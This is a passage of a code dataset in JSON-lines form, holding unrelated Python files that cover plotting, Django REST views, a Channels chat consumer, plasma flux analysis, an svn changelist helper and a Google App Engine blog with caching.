25), cv2.FONT_HERSHEY_SIMPLEX, 1,\r\n (0, 0, 255), 2)\r\n cv2.imwrite(f'capture/{i}.jpg', img)\r\n\r\n out_video.write(img)\r\n i += 1\r\n else:\r\n break\r\n\r\n\r\nelse:\r\n print(\"Can't open 
file\")\r\n\r\nout_video.release()\r\ncap.release()\r\n","sub_path":"video_infer.py","file_name":"video_infer.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"418142418","text":"#!/usr/local/bin/env python3\n\"\"\"\nThis program is designed to take in a \"clean\" csv file containing categorical\nor continuous data and create a graph for each pair of variables. These graphs\nwill then be displayed in an in a web browser window for convenient viewing.\n\nThis code is written using python3.5.1 and the following libraries:\ncycler (0.10.0)\nmatplotlib (1.5.1)\nnumpy (1.10.4)\npandas (0.17.1)\npip (8.0.2)\npyparsing (2.1.0)\npython-dateutil (2.4.2)\npytz (2015.7)\nscipy (0.17.0)\nseaborn (0.7.0)\nsetuptools (18.2)\nsix (1.10.0)\n\"\"\"\n\n# Import necicary libraries\nimport pandas as pd\nimport itertools as it\nimport seaborn as sns\nfrom matplotlib.pyplot import savefig\nimport os\n\ndef jplot(v0, v1, df, file_path):\n g = sns.jointplot(x=v0, y=v1, data = df)\n graph_name = file_path + v0 + \"_vs_\" + v1 + \".png\"\n g.savefig(graph_name)\n\ndef bplot(v0, v1, df, file_path):\n g = sns.boxplot(x=v0, y=v1, data=df)\n h = g.get_figure()\n graph_name = file_path + v0 + \"_vs_\" + v1 + \".png\"\n h.savefig(graph_name)\n\ndef cplot (v0, v1, df, file_path):\n g = sns.countplot(x=v0, hue=v1, data=df)\n h = g.get_figure()\n graph_name = file_path + v0 + \"_vs_\" + v1 + \".png\"\n h.savefig(graph_name)\n\ndef AutoGraph():\n\n # Prompt user for input file\n data = input(\"Please input the file you would like to analyse: \")\n\n file_path = input(\"Please enter the file path to save the output files: \")\n\n while os.path.exists(file_path) != True:\n print(\"There was a problem wit the file path.\")\n print(file_path)\n file_path = input(\"Please re-enter the file path: \")\n\n if file_path[-1] != \"/\":\n file_path += \"/\"\n else:\n pass\n\n # Read the input file into a pandas data frame\n df = pd.read_csv(data)\n\n # Create a list of all the combinations of collumns in the data frame.\n collumns = list(df.columns.values)\n p = it.permutations(collumns, 2)\n # Itterate through the list of combinations.\n for e in p:\n # Test variable type\n v0_len = len(df[e[0]].unique())\n v1_len = len(df[e[1]].unique())\n if v0_len > 100 and v1_len > 100:\n # Greate graph based on variable type.\n jplot(e[0], e[1], df, file_path)\n # Save the graph.\n elif v0_len <= 100 and v1_len > 100:\n bplot(e[0], e[1], df, file_path)\n elif v0_len > 100 and v1_len <= 100:\n bplot(e[1], e[0], df, file_path)\n else:\n cplot(e[0], e[1], df, file_path)\n #save the graph\n\n# graph_name = file_path + e[0] + \"_vs_\" + e[1] + \".png\"\n# savefig(graph_name)\n # Display all of the graphs\n\nAutoGraph()\n","sub_path":"AutoGraph.py","file_name":"AutoGraph.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"283105596","text":"# Program 7a\n'''\nA prime no. is a natural no. that has exactly two distinct natural no. divisors:\n1 and itself.\nA happy no. is a no. that leads to 1 after a sequence of steps where in each\nstep the no. 
is replaced by sum of squares of its digits.\n'''\ntry :\n file1 = open(\"prime.txt\",\"r\")\n file2 = open(\"happy.txt\",\"r\")\n prime_str = file1.read()\n happy_str = file2.read()\n prime = prime_str.split(\", \")\n happy = happy_str.split(\", \")\n lst3 = [int(val) for val in prime if val in happy] #using list comprehension\n print(\"Overlapping numbers :\")\n print(lst3)\n file1.close()\n file2.close()\nexcept IOError :\n print(\"Files not found\")\n#end of program\n\n'''OUTPUT :\nOverlapping numbers :\n[7, 13, 19, 23, 31, 79, 97, 103, 109, 139, 167, 193, 239, 263, 293,\n313, 331, 367, 379, 383, 397, 409, 487,563, 617, 653, 673, 683, 709,\n739, 761, 863, 881, 907, 937]\n'''\n","sub_path":"skn_7a.py","file_name":"skn_7a.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"241091464","text":"from rest_framework import generics, status\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom api.messages import SUCCESS, STATE, ERROR, EXCEPTION, RESULTS\nfrom rest_framework.exceptions import APIException\nfrom v1.commonapp.views.custom_exception import InvalidTokenException, InvalidAuthorizationException\nfrom v1.commonapp.views.pagination import StandardResultsSetPagination\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.filters import OrderingFilter, SearchFilter\nfrom v1.registration.models.registration_subtype import RegistrationSubType as RegistrationSubTypeModel,get_registration_subtype_by_id_string\nfrom v1.registration.serializers.registration_subtype import RegistrationSubTypeListSerializer,RegistrationSubTypeSerializer,RegistrationSubTypeViewSerializer\nfrom v1.commonapp.views.logger import logger\nfrom v1.commonapp.common_functions import is_token_valid, get_payload, is_authorized\nfrom rest_framework.response import Response\nfrom v1.userapp.decorators import is_token_validate, role_required\nfrom v1.utility.models.utility_master import get_utility_by_id_string\nfrom v1.commonapp.common_functions import is_authorized, is_token_valid, get_user_from_token\nfrom v1.commonapp.views.custom_exception import InvalidAuthorizationException, InvalidTokenException, CustomAPIException\nfrom v1.commonapp.views.logger import logger\nfrom master.models import get_user_by_id_string\nfrom api.messages import *\nfrom api.constants import *\n\n# API Header\n# API end Point: api/v1/registration/utility/:id_string/subtype/list\n# API verb: GET\n# Package: Basic\n# Modules: Admin\n# Sub Module: Admin\n# Interaction: Registration SubType list\n# Usage: API will fetch all Registration Subtype list\n# Tables used: Registration SubType\n# Author: Chinmay\n# Created on: 30/11/2020\n\nclass RegistrationSubTypeList(generics.ListAPIView):\n try:\n serializer_class = RegistrationSubTypeListSerializer\n pagination_class = StandardResultsSetPagination\n\n filter_backends = (DjangoFilterBackend, OrderingFilter, SearchFilter)\n filter_fields = ('name', 'tenant__id_string',)\n ordering_fields = ('name', 'tenant',)\n ordering = ('name',) # always give by default alphabetical order\n search_fields = ('name', 'tenant__name',)\n\n def get_queryset(self):\n response, user_obj = is_token_valid(self.request.headers['Authorization'])\n if response:\n if is_authorized(1, 1, 1, user_obj):\n utility = get_utility_by_id_string(self.kwargs['id_string'])\n queryset = RegistrationSubTypeModel.objects.filter(utility=utility, is_active=True)\n if 
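# The skn_7a.py record above assumes precomputed prime/happy lists. For reference, a
# direct happy-number test matching the definition in its docstring: repeatedly replace
# the number by the sum of the squares of its digits; it is happy iff this reaches 1.
def is_happy(n):
    seen = set()
    while n != 1 and n not in seen:
        seen.add(n)
        n = sum(int(d) ** 2 for d in str(n))
    return n == 1

assert is_happy(7) and is_happy(13) and not is_happy(4)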
queryset:\n return queryset\n else:\n raise CustomAPIException(\"Registration Sub Type not found.\", status.HTTP_404_NOT_FOUND)\n else:\n raise InvalidAuthorizationException\n else:\n raise InvalidTokenException\n except Exception as e:\n logger().log(e, 'MEDIUM', module='Admin', sub_module='Utility')\n\n# API Header\n# API end Point: api/v1/registration/subtype\n# API verb: POST\n# Package: Basic\n# Modules: Admin\n# Sub Module: Admin\n# Interaction: Registration post\n# Usage: API will Post the Registartion SubType\n# Tables used: Registration SubType\n# Author: Chinmay\n# Created on: 30/11/2020\nclass RegistrationSubType(GenericAPIView):\n\n @is_token_validate\n #role_required(ADMIN, UTILITY_MASTER, EDIT)\n def post(self, request):\n try:\n user_id_string = get_user_from_token(request.headers['Authorization'])\n user = get_user_by_id_string(user_id_string)\n serializer = RegistrationSubTypeSerializer(data=request.data)\n if serializer.is_valid(raise_exception=False):\n registration_subtype_obj = serializer.create(serializer.validated_data, user)\n view_serializer = RegistrationSubTypeViewSerializer(instance=registration_subtype_obj, context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULTS: view_serializer.data,\n }, status=status.HTTP_201_CREATED)\n else:\n return Response({\n STATE: ERROR,\n RESULTS: list(serializer.errors.values())[0][0],\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logger().log(e, 'HIGH', module='Admin', sub_module='Utility')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULTS: str(e),\n }, status=res.status_code)\n\n\n# API Header\n# API end Point: api/v1/registration/subtype/:id_string\n# API verb: GET,PUT\n# Package: Basic\n# Modules: Admin\n# Sub Module: Admin\n# Interaction: Registration Type corresponding to the id\n# Usage: API will fetch and update Registration SubTypes for a given id\n# Tables used: Registration SubTypes\n# Author: Chinmay\n# Created on: 30/11/2020\n\n\nclass RegistrationSubTypeDetail(GenericAPIView):\n\n @is_token_validate\n #role_required(ADMIN, UTILITY_MASTER, EDIT)\n def get(self, request, id_string):\n try:\n registration_subtype = get_registration_subtype_by_id_string(id_string)\n if registration_subtype:\n serializer = RegistrationSubTypeViewSerializer(instance=registration_subtype, context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULTS: serializer.data,\n }, status=status.HTTP_200_OK)\n else:\n return Response({\n STATE: ERROR,\n }, status=status.HTTP_404_NOT_FOUND)\n except Exception as e:\n logger().log(e, 'MEDIUM', module='Admin', sub_module='Utility')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULTS: str(e),\n }, status=res.status_code)\n\n @is_token_validate\n #role_required(ADMIN, UTILITY_MASTER, EDIT)\n def put(self, request, id_string):\n try:\n user_id_string = get_user_from_token(request.headers['Authorization'])\n user = get_user_by_id_string(user_id_string)\n registration_subtype_obj = get_registration_subtype_by_id_string(id_string)\n if \"name\" not in request.data:\n request.data['name'] = registration_subtype_obj.name\n if registration_subtype_obj:\n serializer = RegistrationSubTypeSerializer(data=request.data)\n if serializer.is_valid(raise_exception=False):\n registration_subtype_obj = serializer.update(registration_subtype_obj, serializer.validated_data, user)\n view_serializer = RegistrationSubTypeViewSerializer(instance=registration_subtype_obj,\n context={'request': request})\n 
return Response({\n STATE: SUCCESS,\n RESULTS: view_serializer.data,\n }, status=status.HTTP_200_OK)\n else:\n return Response({\n STATE: ERROR,\n RESULTS: list(serializer.errors.values())[0][0],\n }, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\n STATE: ERROR,\n }, status=status.HTTP_404_NOT_FOUND)\n except Exception as e:\n logger().log(e, 'HIGH', module='Admin', sub_module='Utility')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULTS: str(e),\n }, status=res.status_code)\n \n","sub_path":"api/v1/registration/views/registration_subtype.py","file_name":"registration_subtype.py","file_ext":"py","file_size_in_byte":7959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"333170641","text":"from channels import Channel, Group\nfrom channels.sessions import channel_session\nfrom channels.auth import channel_session_user, channel_session_user_from_http\nfrom findafriend.models import Page, Chat\nfrom django.contrib.auth.models import User\nimport json\n\n\n@channel_session_user_from_http\ndef ws_con(msg):\n # accept the socket \n msg.reply_channel.send({\n \"accept\": True\n })\n\n # add to the chat group\n Group(\"chat\").add(msg.reply_channel); \n\n# Connected to websocket.receive\n@channel_session_user\ndef ws_msg(msg):\n data = json.loads(msg.content['text'])\n\n # history calling from request\n if(data['isRequest'] == 'True'):\n if(Chat.objects.filter(recipient__in=Page.objects.filter(title=data['recipient'])))is not None:\n # query histroy\n for c in Chat.objects.filter(recipient__in=Page.objects.filter(title=data['recipient'])).order_by('timestamp'):\n chatJSON = {}\n chatJSON[\"sender\"] = c.sender.username\n chatJSON[\"recipient\"] = c.recipient.title\n chatJSON[\"message\"] = c.messageContent\n chatJSON[\"timestamp\"] = c.timestamp.isoformat(' ')\n # send histroy to user\n msg.reply_channel.send({\"text\":json.dumps(chatJSON)})\n else: \n # save to database\n c = Chat(sender=User.objects.get(username=data['sender']), recipient=Page.objects.get(title = data['recipient']), messageContent=data['message'])\n c.save()\n \n # send message to the group\n Group(\"chat\").send({\n \"text\": json.dumps(data) \n })\n\n@channel_session_user\ndef ws_discon(msg):\n Group(\"chat\").discard(msg.reply_channel)\n","sub_path":"tacos/tacos/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"510190274","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as pl\nimport os\nimport kawa.myplot as my\nimport kawa.daq as dq\nmy.defalt(bold = True)\n#import seaborn\nhome = os.environ[\"HOME\"]\nos.chdir(home + \"/KYTHON/paper\")\n\nNe_All = pd.read_csv(\"Ne_list_All.csv\") #Fluctuation component\nNe_flc = pd.read_csv(\"Ne_list.csv\")\nd_phi = pd.read_csv(\"dp_list.csv\")\nVn = pd.read_csv(\"Vn_list.csv\")\nIn = pd.read_csv(\"In_list.csv\")\ntau = np.load(\"tau.npy\")\nprint(Ne_flc.shape,d_phi.shape,Vn.shape,In.shape)\nprint(tau[1]-tau[0])\n\nc = 4.0\n\nk = 100 # k = m/r\nfreq = 9e3\ndelta = 2*np.pi*freq / k * 1e-6\nB0 = 0.13 #[T]\nprint(\"δ = {}\".format(delta))\nv_ExB = d_phi / delta /B0\nr_list = np.arange(2,7,0.5)\nflux = v_ExB*Ne_flc #/1e21\n\nmx = len(tau)\nfor i in[3.0,3.5]:\n grad_n = ( Ne_All.loc[:mx,str(i+0.5)] - Ne_All.loc[:mx,str(i-0.5)] )/0.01 #/1e20\n pl.plot(tau[:mx+1],grad_n,label = \"{}cm\".format(i))\npl.xlabel(\"tau 
(ms)\")\npl.ylabel(r\"$\\partial_r \\mathrm{n}$ ($\\mathrm{m^{-2}sec^{-1}}$)\")\npl.xlim(tau.min(),tau.max())\npl.legend()\npl.show()\n #pl.plot(-grad_n,flux.loc[:mx,str(i)],label = \"r = {} cm\".format(i))\n# fig,ax1 = pl.subplots()\n# ax2 = ax1.twinx()\n# ax1.plot(grad_n,color = \"red\")\n# ax2.plot(flux.loc[:mx,\"3.0\"])\npl.show()\n\n# # pl.scatter(grad_n[0],flux.loc[0,str(i)],color = \"k\")\n# # pl.scatter(grad_n[mx],flux.loc[mx,str(i)],color = \"r\")\n# pl.axhline(0,linestyle = \"--\",color = \"k\",linewidth = 1)\n# pl.axvline(0,linestyle = \"--\",color = \"k\",linewidth = 1)\n# pl.legend(fontsize = 12)\n# # pl.xlim(-3.3e18,2e18)\n# # pl.ylim(-2.1e21,1e21)\n# pl.yticks([-2,-1,0,1])\n# pl.grid(color='gray',alpha = 0.5)\n# # pl.ylabel(r\"$\\Gamma_r \\mathrm{(10^{21}/m^2s^1)}$\")\n# # pl.xlabel(r\"$\\partial_r \\mathrm{n_{e}} \\mathrm{(10^{20}/m^4)}$\")\n# # pl.tight_layout\n# pl.show()\n# # c = 1\n\n\n# refpath = home + \"/KYTHON/ref/\"\n# datapath = home + \"/data/\"\n# fid = dq.pantaADC()\n# dag5 = pd.read_csv(refpath + \"5ch.dag\",dtype = str,comment = \"#\")\n# dag64 = pd.read_csv(refpath + \"64ch.dag\",dtype = str,comment = \"#\")\n\n\n\n# shotno = \"105396\"\n# sub = \"011\"\n# profile = np.zeros(10)\n# c = 1\n# for i in [4,3,2,1,0]:\n# Iis, time = fid.read(shot = shotno, subshot = sub ,\n# tower = dag5.loc[i, \"tower\" ].strip(),\n# station = dag5.loc[i, \"station\"].strip(),\n# ch = dag5.loc[i, \"ch\" ].strip(),\n# dir = datapath, samplingtime = True,\n# start = 240000, end = 540000)\n# Iis /= 20\n# ne = np.mean( Iis )\n# profile[2*(c-1)] = ne\n# print(2*(c-1))\n# c += 1\n# shotno = \"105398\"\n# sub = \"011\"\n# c = 1\n# for i in [4,3,2,1,0]:\n# Iis, time = fid.read(shot = shotno, subshot = sub ,\n# tower = dag5.loc[i, \"tower\" ].strip(),\n# station = dag5.loc[i, \"station\"].strip(),\n# ch = dag5.loc[i, \"ch\" ].strip(),\n# dir = datapath, samplingtime = True,\n# start = 240000, end = 540000)\n# Iis /= 20\n# ne = np.mean( Iis )\n# profile[2*(c-1)+1] = ne\n# c += 1\n# print(2*(c-1)+1)\n\n# import scipy.constants as sc\n# mi = sc.proton_mass * 40 #Ar\n# e = sc.e\n# k = sc.k\n# pi = sc.pi\n# r = 4.0e-4\n# S = pi*r**2 + 2 * pi * r * 3.5e-3\n# Te_profile = np.array([2.5, 2.4, 2.0, 1.7, 1.2, 0.9, 0.8, 0.75, 0.7, 0.7] )\n# Cs = (Te_profile*e/mi)**(1/2)\n# coef = np.exp(1/2)/S/e/Cs\n\n\n# r = np.arange(2,7,0.5)\n# pl.plot(r,coef*profile)\n# pl.show()\n# print(profile)\n\n# dt = 1e-6\n# edge1 = int(0.24 / dt)\n# edge2 = int(0.54 / dt)\n# #=============================================\n# # 105396_011 Iis r = 2.0-6.0\n# #=============================================\n# #reference 64 ==> ch1 Iis\n# sub = \"011\"\n# shotno = \"105396\"\n# grad_n = ( df_I[4.0] - df_I[3.0] ) / 0.01\n# # pl.scatter(r_list,np.mean(v_ExB*Ne),color = \"b\")\n# # pl.hlines(0,2,6.5)\n# # pl.ylim(-6e20,6e20)\n# # pl.show()","sub_path":"paper/Flux_relation.py","file_name":"Flux_relation.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575981983","text":"from datetime import datetime\nimport requests\n\nfrom pytz import timezone\n\n\ndef _main():\n midnighters = get_midnighters(load_attempts())\n for midnighter in sorted(midnighters):\n print(midnighter)\n\n\ndef load_attempts():\n page_num = 1\n while True:\n attempts_page = fetch_attempts_page(page_num)\n for record in attempts_page['records']:\n yield {\n 'username': record['username'],\n 'timestamp': record['timestamp'],\n 'timezone': record['timezone'],\n }\n 
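# The Flux_relation.py record above estimates the turbulent particle flux as
# Gamma_r = <v_ExB * n_tilde>, with v_ExB ~ E_theta/B0 and the poloidal field
# approximated by the potential difference over the separation delta. A minimal
# restatement; k, freq and B0 follow the record, the signals are synthetic.
import numpy as np

k, freq, B0 = 100, 9e3, 0.13
delta = 2 * np.pi * freq / k * 1e-6            # separation scale (m), as in the record
rng = np.random.default_rng(1)
d_phi = rng.normal(size=10000)                 # floating-potential difference (V), synthetic
n_tilde = 0.5 * d_phi + rng.normal(size=10000) # density fluctuation, partly correlated
v_exb = d_phi / delta / B0                     # E x B velocity estimate (m/s)
print("mean flux:", np.mean(v_exb * n_tilde))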
if page_num == attempts_page['number_of_pages']:\n break\n else:\n page_num += 1\n\n\ndef fetch_attempts_page(page):\n return requests.get(\n 'https://devman.org/api/challenges/solution_attempts/',\n params={'page': page}\n ).json()\n\n\ndef get_midnighters(attempts):\n midnighters = set()\n midnight = 0\n working_hours_start = 6\n\n for attempt in attempts:\n attempt_dt = datetime.fromtimestamp(\n attempt['timestamp'],\n timezone(attempt['timezone'])\n )\n if midnight < attempt_dt.hour < working_hours_start:\n midnighters.add(attempt['username'])\n\n return list(midnighters)\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"387305657","text":"import unittest\n\nfrom training.board_drawer import display_board\n\n\nclass TestTTTBoardDrawer(unittest.TestCase):\n\n def test_display_board(self):\n\n board = [1, 0, 0, -1, -1, 1, 0, 0, -1]\n\n print(display_board(board))\n\n board = [0, 0, 1, -1, -1, 0, 0, 0, -1]\n\n print(display_board(board))\n","sub_path":"tests/test_board_drawer.py","file_name":"test_board_drawer.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"306914339","text":"from moviepy.editor import *\nimport providad\nimport providad.asset\nimport numpy as np\nfrom moviepy import editor\n\nclass LetterBase:\n def moveLetters(self, letters):\n return [ letter[0].set_pos(self.move(letter[1],i,len(letters))) for i,letter in enumerate(letters)]\n\n def move(self, screenpos,i,nletters):\n pass\n\nclass LetterMove(LetterBase):\n def __init__(self, duration, percentageFromLeft=20, percentageFromTop=50, fontSize=60, txtcolor='red', bgcolor='transparent', font='Amiri-Bold'):\n self.duration = duration\n self.fontSize = fontSize\n self.txtcolor= txtcolor\n self.bgcolor= bgcolor\n self.font= font\n self.top= percentageFromTop\n self.left= percentageFromLeft\n\n def apply(self, clip, startTime, asset):\n w,h = clip.size\n screensize = clip.size\n letters= []\n sumwidth=0\n for a in range(0, len(asset.value)):\n tmp = []\n tmp.append( TextClip(asset.value[a], color=self.txtcolor, bg_color=self.bgcolor, font=self.font, fontsize=self.fontSize) )\n tmp.append( (self.left * (w/100) + sumwidth , self.top * (h/100) ) )\n sumwidth += tmp[0].w +5\n letters.append(tmp)\n\n newVideos= CompositeVideoClip( (self.moveLetters(letters)), size = screensize)\n newVideos = newVideos.set_start(startTime).set_duration(self.duration)\n return editor.CompositeVideoClip([clip, newVideos])","sub_path":"src/providad/asset_effects_Letters_Base.py","file_name":"asset_effects_Letters_Base.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"558845372","text":"# coding: utf8\n\nimport subprocess\nimport re\nimport os\n\nclass Changelist:\n\n def __init__(self, merge_workspace):\n self.merge_workspace = merge_workspace\n\n @staticmethod\n def _executor(cmd):\n # cmd : string\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n out, err = p.communicate()\n return out, err\n\n def status(self):\n cmd = 'svn status %s'% self.merge_workspace\n out, err = Changelist._executor(cmd)\n return out, err\n\n def changelist_str2list(self):\n cls, err = self.status()\n if err:\n print('changelist 
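# In the seek_dev_nighters record above, the strict comparison
# `midnight < attempt_dt.hour < working_hours_start` (i.e. 0 < hour < 6) silently drops
# attempts made between 00:00 and 00:59; an inclusive lower bound is probably intended.
# A minimal check with a fixed timestamp:
from datetime import datetime
from pytz import timezone

dt = datetime.fromtimestamp(0, timezone('UTC'))   # 1970-01-01 00:00:00 UTC
print(dt.hour, 0 <= dt.hour < 6)                  # -> 0 True (excluded by the strict '<')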
error')\n return\n new_cls = []\n for cl in cls.split('\\n'):\n if cl == '':\n continue\n new_cl = cl.split(' ')[-1]\n new_cls.append(new_cl)\n return new_cls\n\n def make_changelist(self):\n new_lst = []\n ptn = r'(.*/deploys)/(.*.*)'\n conf = None\n for cl in self.changelist_str2list():\n m = re.search(ptn, cl)\n if m:\n if 'conf_checklist.txt' == m.group(2):\n conf = os.path.join(m.group(1), 'conf_checklist.txt')\n continue\n new_lst.append(cl)\n if conf:\n new_lst.append(conf)\n if len(new_lst) == 0:\n print('changelist is empty')\n return\n cl_out, cl_err = Changelist._executor('svn changelist cl %s'%(' '.join(new_lst)))\n print('cl_out', cl_out)\n print('cl_err', cl_err)\n return 'cl'\n\n def commit_changelist(self, msg):\n os.chdir(self.merge_workspace)\n c_msg, c_err = self._executor('svn commit --cl cl -m %s' % (msg))\n print('c_msg', c_msg)\n print('c_err', c_err)\n\n def find_del_deploy_item(self, merge_workspace):\n deploy_dir = os.path.join(merge_workspace, 'de')\n new_lst = []\n ptn = r'(.*/deploys)/(.*.*)'\n conf = None\n for cl in self.changelist_str2list():\n m = re.search(ptn, cl)\n if m:\n if 'conf_checklist.txt' == m.group(2):\n conf = os.path.join(m.group(1), 'conf_checklist.txt')\n continue\n new_lst.append(cl)\n if conf:\n new_lst.append(conf)\n if len(new_lst) == 0:\n print('changelist is empty')\n return\n cl_out, cl_err = Changelist._executor('svn changelist cl %s'%(' '.join(new_lst)))\n print('cl_out', cl_out)\n print('cl_err', cl_err)\n return 'cl'\n\nif __name__ == '__main__':\n ws = '/home/svn/temp/docker'\n cl = Changelist(ws)\n cls = cl.changelist_str2list()\n final_list = cl.make_changelist(cls)\n if 'cl' == final_list:\n print('commit changelist')\n cl.commit_changelist('commit_test')","sub_path":"han-test/changelist.py","file_name":"changelist.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"160216422","text":"#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport webapp2\nimport os\nimport jinja2\nfrom xml.dom import minidom\nimport urllib2\n\n#library to debugging\nimport logging\n\n# import database\nfrom google.appengine.ext import db\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader= jinja2.FileSystemLoader(template_dir), autoescape=True)\n\n\nIP_PAGE = \"http://ip-api.com/xml/\"\nGMAPS_URL = \"http://maps.googleapis.com/maps/api/staticmap?size=380x263&sensor=false\"\ndef get_coords(ip) :\n\t# test ip\n\tip = \"107.22.175.13\"\n\turl = IP_PAGE + ip\n\tcontent = None\n\n\ttry :\n\t\tcontent = urllib2.urlopen(url)\n\texcept :\n\t\tNone\n\n\tif content :\n\t\tparse_xml = minidom.parseString(content.read())\n\t\tlat = parse_xml.getElementsByTagName(\"lat\")[0].childNodes[0].nodeValue\n\t\tlon = parse_xml.getElementsByTagName(\"lon\")[0].childNodes[0].nodeValue\n\t\treturn db.GeoPt(lat, lon)\n\n# generating the image from url to send to 
google api\ndef gmaps_img(points):\n ###Your code here\n base_markers= \"&markers=\"\n markers_string = ''\n for p in points :\n \tmarkers_string += base_markers + str(p.lat) + \",\" + str(p.lon)\n\n url = GMAPS_URL + markers_string\n return url\n\n# hashing table for cache\nCACHE = {}\n# this get the most recent created arts\n# update is for always has the cache full and avoid cache stampede\ndef top_arts(update = false) :\n\t# this is the key of the query in the cache\n\tkey = \"top\"\n\tif not update or key in CACHE :\n\t\tarts = CACHE[key]\n\telse :\n\t\tlogging.error(\"DB QUERY\")\n\t\t# executing the query and saving the results in a variable\n\t\t# remember that in google data store we only can use select * from, all the properties\n\t\tarts = db.GqlQuery(\"SELECT * FROM Art ORDER BY created DESC\")\n\t\t# prevent the running of multiples queries\n\t\tarts = list(arts)\n\t\tCACHE[key] = arts\n\treturn arts\n\nclass Handler(webapp2.RequestHandler) :\n\n\tdef write(self, *a, **kw) :\n\n\t\tself.response.out.write(*a, **kw)\n\n\tdef render_str(self, template, **params) :\n\n\t\tt = jinja_env.get_template(template)\n\t\treturn t.render(params)\n\n\tdef render(self, template, **kw) :\n\n\t\tself.write(self.render_str(template, **kw))\n\n\n# in appengine databases are definen by classes and are entities\n\nclass Art(db.Model) :\n\n\t# defining properties with their respective fields\n\t\n\ttitle = db.StringProperty(required = True) # required is a constraint like not null in sql server\n\tart = db.TextProperty(required = True)\n\t# save the date automatically\n\tcreated = db.DateTimeProperty(auto_now_add = True) \n\tcoords = db.GeoPtProperty()\t\n\nclass MainHandler(Handler):\n\n\t# function to render the form\n\t# we can render with \n\tdef render_front(self, title=\"\", art=\"\", error=\"\") :\n\t\t# getting the top 10 arts\n\t\tarts = top_arts()\n\t\t# saving who was coordenates\n\t\tpoints = []\n\t\tfor a in arts :\n\t\t\tif a.coords :\n\t\t\t\tpoints.append(a.coords)\n\n\t\t# generating img url\n\t\timg_url = None\n\t\tif points :\n\t\t\timg_url = gmaps_img(points)\n\n\t\tself.render(\"index.html\", title = title, art = art, error = error, arts=arts, img_url=img_url)\n\n\t\n\tdef get(self):\n\t\tself.render_front()\n\t\n\tdef post(self) :\n\t\t#get values\n\t\ttitle = self.request.get(\"title\")\n\t\tart = self.request.get(\"art\")\n\t\tif title and art :\n\t\t\t# creating a new object of the entity\n\t\t\ta = Art(title=title, art=art)\n\t\t\t# getting ip\n\t\t\tmy_coords = self.request.remote_addr\n\t\t\ta.coords = get_coords(my_coords)\n\t\t\t# save it in the database\n\t\t\ta.put()\n\t\t\t# updating the cache only when writing\n\t\t\ttop_arts(True)\n\n\n\t\t\t# # clearing the catch for get it to its original state\n\t\t\t# do not do this for avoid cache stampide\n\t\t\t# CACHE.clear()\n\n\t\t\tlogging.error(CACHE)\n\t\t\tself.redirect(self.request.url)\n\t\telse :\n\t\t\terror = \"We need both, the title and the art work\"\n\t\t\tself.render_front(title, art, error)\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n","sub_path":"Lessons/Lesson 6 - Caching/draw_blog_own_caching.py","file_name":"draw_blog_own_caching.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"63277996","text":"#\n# @lc app=leetcode id=714 lang=python3\n#\n# [714] Best Time to Buy and Sell Stock with Transaction Fee\n#\n# 
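# The read-through cache in the blog record above has two slips: Python booleans are
# capitalised (False, not false), and the guard needs AND rather than OR, or CACHE[key]
# can raise KeyError on a cold cache. A corrected, framework-free sketch; fetch() stands
# in for the GqlQuery call and is illustrative, not part of the original file.
CACHE = {}

def top_arts(fetch, update=False):
    key = "top"
    if not update and key in CACHE:
        return CACHE[key]
    arts = list(fetch())  # only hit the datastore on a miss or an explicit refresh
    CACHE[key] = arts
    return arts

print(top_arts(lambda: ["art1", "art2"]))          # cold cache: fetches
print(top_arts(lambda: ["art1", "art2", "art3"]))  # warm cache: returns cached list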
